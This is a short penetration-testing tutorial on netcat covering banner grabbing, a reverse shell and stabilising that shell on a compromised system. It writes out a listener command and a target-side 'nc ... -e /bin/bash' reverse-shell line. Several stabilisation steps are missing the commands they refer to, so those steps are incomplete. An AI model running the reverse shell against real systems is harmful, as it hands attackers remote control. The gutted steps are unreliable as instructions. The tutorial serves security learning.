Netcat - Advanced

Usage and Examples

Using netcat for banner grabbing

nc 192.168.1.1 80

Reverse shell with netcat

On listener's machine:

nc -lvnp 1234

(The option specifies listening verbosely on the given port with no name resolution)

On target machine:

nc [target_ip] 1234 -e /bin/bash

(Specifying -e /bin/bash is optional.)

Stabilizing Netcat

By default, Netcat shells are often unstable and lack features like command history, tab completion, and proper terminal handling. Stabilizing the shell involves transforming it into a more robust and interactive session in order to improve its reliability, and enhance the control over the compromised system.

Methods for Netcat Shell Stabilization

Using rlwrap

Steps:

1. Install rlwrap in your local machine if not installed

2. Use the netcat command with rlwrap

1. Background the shell with Ctrl + Z .

2. Re-enter the shell

Upgrading to fully interactive TTY

Use python:

Setting terminal variables

Steps:

Background the netcat shell

Use the command CTRL + Z.

Set terminal typs

Export terminal variables

(Replace [number] with the appropriate values for your terminal size)

Overview of Netcat Shell stabilization

Step 1:

Use Python to spawn a better-featured bash shell, which will make our shell look a bit prettier.

We still won’t be able to use tab autocomplete or the arrow keys.

Step 2:

Get access to term commands such as clear.

Step 3:

Now, background the shell.

Step 4:

Use the following back in the normal terminal:

This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes.

Step 5:

Finally correct the distorted rows and columns of the terminal shell where we write command.